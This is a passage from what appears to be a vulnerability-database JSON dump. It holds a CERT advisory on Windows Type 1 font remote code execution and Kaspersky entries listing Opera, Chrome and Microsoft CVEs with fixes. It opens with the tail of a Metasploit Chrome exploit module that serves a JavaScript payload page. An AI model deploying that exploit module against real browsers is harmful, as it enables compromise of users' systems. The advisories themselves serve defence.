%Q^\n<html>\n<head>\n<script>\n#{jscript}\n</script>\n</head>\n<body>\n</body>\n</html>\n ^\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\n end\n\nend\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/chrome_jscreate_sideeffect.rb"}], "cert": [{"lastseen": "2020-09-18T20:41:35", "bulletinFamily": "info", "cvelist": ["CVE-2020-1020"], "description": "### Overview \n\nMicrosoft Windows contains two vulnerabilities in the parsing of Adobe Type 1 fonts, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nAdobe Type Manager, which is provided by `atmfd.dll`, is a kernel module that is provided by Windows and provides support for OpenType fonts. Two vulnerabilities in the Microsoft Windows Adobe Type Manager library may allow an unauthenticated remote attacker to execute arbitrary code on a vulnerable system. This vulnerability affects all supported versions of Windows, as well as Windows 7. This vulnerability is being exploited in the wild. \n \n--- \n \n### Impact \n\nBy causing a Windows system to open a specially crafted document or view it in the Windows preview pane, an unauthenticated remote attacker may be able to execute arbitrary code with kernel privileges on a vulnerable system. Windows 10 based operating systems would execute the code with limited privileges, in an [AppContainer](<https://docs.microsoft.com/en-us/windows/win32/secauthz/appcontainer-isolation>) sandbox. \n \n--- \n \n### Solution \n\n**Apply an update**\n\nThis issue has been addressed in [Microsoft updates for CVE-2020-1020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>). Please also consider the following workarounds that are listed in [Microsoft Security Advisory ADV200006](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>): \n \n--- \n \n**Rename ATMFD.DLL** \n \nThis mitigation appears to be to the most effective workaround for this vulnerability, as it blocks the vulnerable code from being used by Windows. Please see [Microsoft Security Advisory ADV200006](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>) for more details. Because supported Windows 10 versions do not use ATMFD.DLL, this mitigation is not applicable on those platforms. \n \n**Disable the preview pane and details pane in Windows Explorer** \n \nPlease see [Microsoft Security Advisory ADV200006](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>) for more details. \n \n**Disable the WebClient service** \n \nPlease see [Microsoft Security Advisory ADV200006](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>) for more details. \n \n--- \n \n### Vendor Information\n\n354840\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Microsoft Affected\n\nNotified: March 23, 2020 Updated: April 14, 2020 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 9 | E:F/RL:W/RC:C \nEnvironmental | 9.0 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>\n * <https://docs.microsoft.com/en-us/windows/win32/secauthz/appcontainer-isolation>\n\n### Acknowledgements\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2020-1020](<http://web.nvd.nist.gov/vuln/detail/CVE-2020-1020>) \n---|--- \n**Date Public:** | 2020-03-23 \n**Date First Published:** | 2020-03-23 \n**Date Last Updated: ** | 2020-04-14 18:00 UTC \n**Document Revision: ** | 26 \n", "modified": "2020-04-14T18:00:00", "published": "2020-03-23T00:00:00", "id": "VU:354840", "href": "https://www.kb.cert.org/vuls/id/354840", "type": "cert", "title": "Microsoft Windows Type 1 font parsing remote code execution vulnerabilities", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2020-09-02T12:04:53", "bulletinFamily": "info", "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "description": "### *Detect date*:\n03/03/2020\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Opera. Malicious users can exploit these vulnerabilities to cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nOpera earlier than 67.0.3575.53\n\n### *Solution*:\nUpdate to the latest version \n[Download Opera](<https://www.opera.com>)\n\n### *Original advisories*:\n[Changelog fo Opera 67](<https://blogs.opera.com/desktop/changelog-for-67/#b3575.53>) \n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html>) \n\n\n### *Impacts*:\nDoS \n\n### *Related products*:\n[Opera](<https://threats.kaspersky.com/en/product/Opera/>)\n\n### *CVE-IDS*:\n[CVE-2020-6418](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6418>)0.0Unknown \n[CVE-2020-6407](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6407>)0.0Unknown", "edition": 1, "modified": "2020-06-18T00:00:00", "published": "2020-03-03T00:00:00", "id": "KLA11722", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11722", "title": "\r KLA11722Multiple vulnerabilities in Opera ", "type": "kaspersky", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-02T11:42:48", "bulletinFamily": "info", "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "description": "### *Detect date*:\n02/24/2020\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Google Chrome. Malicious users can exploit these vulnerabilities to cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nGoogle Chrome earlier than 80.0.3987.122\n\n### *Solution*:\nUpdate to the latest version \n[Download Google Chrome](<https://www.google.com/chrome/>)\n\n### *Original advisories*:\n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html>) \n\n\n### *Impacts*:\nDoS \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2020-6418](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6418>)0.0Unknown \n[CVE-2020-6407](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6407>)0.0Unknown", "edition": 1, "modified": "2020-06-18T00:00:00", "published": "2020-02-24T00:00:00", "id": "KLA11678", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11678", "title": "\r KLA11678Multiple vulnerabilities in Google Chrome ", "type": "kaspersky", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-02T11:46:27", "bulletinFamily": "info", "cvelist": ["CVE-2020-0967", "CVE-2020-0962", "CVE-2020-0687", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0946", "CVE-2020-0958", "CVE-2020-0987", "CVE-2020-0992", "CVE-2020-1008", "CVE-2020-1094", "CVE-2020-0959", "CVE-2020-0956", "CVE-2020-0953", "CVE-2020-0938", "CVE-2020-0952", "CVE-2020-0993", "CVE-2020-0988", "CVE-2020-1014", "CVE-2020-1000", "CVE-2020-1011", "CVE-2020-0821", "CVE-2020-1005", "CVE-2020-0999", "CVE-2020-0995", "CVE-2020-0960", "CVE-2020-0964", "CVE-2020-0982", "CVE-2020-1015", "CVE-2020-0955", "CVE-2020-1027", "CVE-2020-0957", "CVE-2020-1020", "CVE-2020-0889", "CVE-2020-1009", "CVE-2020-0968", "CVE-2020-0966", "CVE-2020-1007", "CVE-2020-1004", "CVE-2020-0994", "CVE-2020-0965"], "description": "### *Detect date*:\n04/14/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft products (Extended Support Update). Malicious users can exploit these vulnerabilities to execute arbitrary code, obtain sensitive information, gain privileges, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 1903 for 32-bit Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nInternet Explorer 9 \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server, version 1903 (Server Core installation) \nWindows 10 for 32-bit Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2019 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows Server 2016 \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1709 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2016 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2012 R2 \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows Server, version 1909 (Server Core installation) \nWindows 10 Version 1709 for 32-bit Systems \nWindows Server, version 1803 (Server Core Installation) \nInternet Explorer 11 \nWindows RT 8.1 \nWindows 10 Version 1803 for ARM64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2019 (Server Core installation) \nWindows 8.1 for x64-based systems \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 1803 for 32-bit Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2012 \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1709 for ARM64-based Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-0968](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0968>) \n[CVE-2020-0987](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0987>) \n[CVE-2020-0982](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0982>) \n[CVE-2020-0889](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0889>) \n[CVE-2020-0960](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0960>) \n[CVE-2020-0962](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0962>) \n[CVE-2020-1007](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1007>) \n[CVE-2020-0964](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0964>) \n[CVE-2020-0965](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0965>) \n[CVE-2020-0988](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0988>) \n[CVE-2020-0967](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0967>) \n[CVE-2020-0959](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0959>) \n[CVE-2020-1015](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1015>) \n[CVE-2020-1014](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1014>) \n[CVE-2020-0946](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0946>) \n[CVE-2020-1011](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1011>) \n[CVE-2020-1009](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1009>) \n[CVE-2020-0907](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0907>) \n[CVE-2020-0895](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0895>) \n[CVE-2020-1094](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1094>) \n[CVE-2020-0687](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0687>) \n[CVE-2020-0995](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0995>) \n[CVE-2020-0994](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0994>) \n[CVE-2020-0993](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0993>) \n[CVE-2020-0992](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0992>) \n[CVE-2020-0821](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0821>) \n[CVE-2020-0999](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0999>) \n[CVE-2020-1000](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1000>) \n[CVE-2020-0953](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0953>) \n[CVE-2020-0952](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0952>) \n[CVE-2020-1004](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1004>) \n[CVE-2020-1005](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1005>) \n[CVE-2020-0957](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0957>) \n[CVE-2020-0956](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0956>) \n[CVE-2020-1008](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1008>) \n[CVE-2020-0958](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0958>) \n[CVE-2020-1020](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1020>) \n[CVE-2020-1027](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1027>) \n[CVE-2020-0938](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0938>) \n[CVE-2020-0966](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0966>) \n[CVE-2020-0955](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0955>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows Server](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Server/>)\n\n### *CVE-IDS*:\n[CVE-2020-0968](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0968>)0.0Unknown \n[CVE-2020-0987](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0987>)0.0Unknown \n[CVE-2020-0982](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0982>)0.0Unknown \n[CVE-2020-0889](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0889>)0.0Unknown \n[CVE-2020-0960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0960>)0.0Unknown \n[CVE-2020-0962](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0962>)0.0Unknown \n[CVE-2020-1007](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1007>)0.0Unknown \n[CVE-2020-0964](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0964>)0.0Unknown \n[CVE-2020-0965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0965>)0.0Unknown \n[CVE-2020-0988](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0988>)0.0Unknown \n[CVE-2020-0967](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0967>)0.0Unknown \n[CVE-2020-0959](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0959>)0.0Unknown \n[CVE-2020-1015](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1015>)0.0Unknown \n[CVE-2020-1014](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1014>)0.0Unknown \n[CVE-2020-0946](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0946>)0.0Unknown \n[CVE-2020-1011](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1011>)0.0Unknown \n[CVE-2020-1009](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1009>)0.0Unknown \n[CVE-2020-0907](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0907>)0.0Unknown \n[CVE-2020-0895](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0895>)0.0Unknown \n[CVE-2020-1094](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1094>)0.0Unknown \n[CVE-2020-0687](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0687>)0.0Unknown \n[CVE-2020-0995](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0995>)0.0Unknown \n[CVE-2020-0994](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0994>)0.0Unknown \n[CVE-2020-0993](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0993>)0.0Unknown \n[CVE-2020-0992](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0992>)0.0Unknown \n[CVE-2020-0821](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0821>)0.0Unknown \n[CVE-2020-0999](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0999>)0.0Unknown \n[CVE-2020-1000](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1000>)0.0Unknown \n[CVE-2020-0953](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0953>)0.0Unknown \n[CVE-2020-0952](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0952>)0.0Unknown \n[CVE-2020-1004](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1004>)0.0Unknown \n[CVE-2020-1005](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1005>)0.0Unknown \n[CVE-2020-0957](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0957>)0.0Unknown \n[CVE-2020-0956](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0956>)0.0Unknown \n[CVE-2020-1008](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1008>)0.0Unknown \n[CVE-2020-0958](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0958>)0.0Unknown \n[CVE-2020-1020](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1020>)0.0Unknown \n[CVE-2020-1027](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1027>)0.0Unknown \n[CVE-2020-0938](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0938>)0.0Unknown \n[CVE-2020-0966](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0966>)0.0Unknown \n[CVE-2020-0955](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0955>)0.0Unknown\n\n### *KB list*:\n[4550951](<http://support.microsoft.com/kb/4550951>) \n[4550964](<http://support.microsoft.com/kb/4550964>) \n[4550957](<http://support.microsoft.com/kb/4550957>) \n[4550905](<http://support.microsoft.com/kb/4550905>) \n[4550965](<http://support.microsoft.com/kb/4550965>)\n\n### *Microsoft official advisories*:", "edition": 1, "modified": "2020-06-18T00:00:00", "published": "2020-04-14T00:00:00", "id": "KLA11743", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11743", "title": "\r KLA11743Multiple vulnerabilities in Microsoft products (ESU) ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-17T03:25:16", "bulletinFamily": "info", "cvelist": ["CVE-2020-0950", "CVE-2020-1016", "CVE-2020-0983", "CVE-2020-0917", "CVE-2020-0962", "CVE-2020-0687", "CVE-2020-0934", "CVE-2020-0907", "CVE-2020-0946", "CVE-2020-0948", "CVE-2020-0958", "CVE-2020-0794", "CVE-2020-0947", "CVE-2020-0987", "CVE-2020-0996", "CVE-2020-0981", "CVE-2020-0784", "CVE-2020-0992", "CVE-2020-1008", "CVE-2020-1094", "CVE-2020-0913", "CVE-2020-0940", "CVE-2020-0699", "CVE-2020-0959", "CVE-2020-0918", "CVE-2020-1017", "CVE-2020-0956", "CVE-2020-0949", "CVE-2020-1001", "CVE-2020-0953", "CVE-2020-0888", "CVE-2020-0938", "CVE-2020-0952", "CVE-2020-0942", "CVE-2020-0993", "CVE-2020-0945", "CVE-2020-0988", "CVE-2020-1014", "CVE-2020-0937", "CVE-2020-0985", "CVE-2020-1003", "CVE-2020-1000", "CVE-2020-1006", "CVE-2020-1011", "CVE-2020-0944", "CVE-2020-0821", "CVE-2020-1005", "CVE-2020-1029", "CVE-2020-0999", "CVE-2020-0995", "CVE-2020-0960", "CVE-2020-0964", "CVE-2020-0982", "CVE-2020-1015", "CVE-2020-0955", "CVE-2020-1027", "CVE-2020-0910", "CVE-2020-1020", "CVE-2020-0889", "CVE-2020-0939", "CVE-2020-1009", "CVE-2020-1007", "CVE-2020-0936", "CVE-2020-1004", "CVE-2020-0994", "CVE-2020-0965"], "description": "### *Detect date*:\n04/14/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, gain privileges, cause denial of service, bypass security restrictions.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 1903 for 32-bit Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server, version 1903 (Server Core installation) \nWindows 10 for 32-bit Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2019 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows Server 2016 \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1709 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2016 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2012 R2 \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows Server, version 1909 (Server Core installation) \nWindows 10 Version 1709 for 32-bit Systems \nWindows Server, version 1803 (Server Core Installation) \nWindows RT 8.1 \nWindows 10 Version 1803 for ARM64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2019 (Server Core installation) \nWindows 8.1 for x64-based systems \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 1803 for 32-bit Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2012 \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1709 for ARM64-based Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-0987](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0987>) \n[CVE-2020-0985](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0985>) \n[CVE-2020-0982](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0982>) \n[CVE-2020-0983](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0983>) \n[CVE-2020-0981](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0981>) \n[CVE-2020-0960](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0960>) \n[CVE-2020-0962](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0962>) \n[CVE-2020-0956](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0956>) \n[CVE-2020-0964](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0964>) \n[CVE-2020-0965](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0965>) \n[CVE-2020-0988](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0988>) \n[CVE-2020-0942](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0942>) \n[CVE-2020-0959](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0959>) \n[CVE-2020-1015](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1015>) \n[CVE-2020-1014](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1014>) \n[CVE-2020-0946](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0946>) \n[CVE-2020-0947](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0947>) \n[CVE-2020-1011](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1011>) \n[CVE-2020-0958](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0958>) \n[CVE-2020-0907](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0907>) \n[CVE-2020-0948](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0948>) \n[CVE-2020-0949](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0949>) \n[CVE-2020-0889](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0889>) \n[CVE-2020-0945](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0945>) \n[CVE-2020-1007](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1007>) \n[CVE-2020-1094](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1094>) \n[CVE-2020-0784](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0784>) \n[CVE-2020-0910](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0910>) \n[CVE-2020-1003](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1003>) \n[CVE-2020-0913](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0913>) \n[CVE-2020-0687](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0687>) \n[CVE-2020-0953](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0953>) \n[CVE-2020-1029](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1029>) \n[CVE-2020-0995](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0995>) \n[CVE-2020-0994](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0994>) \n[CVE-2020-0944](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0944>) \n[CVE-2020-0996](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0996>) \n[CVE-2020-0993](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0993>) 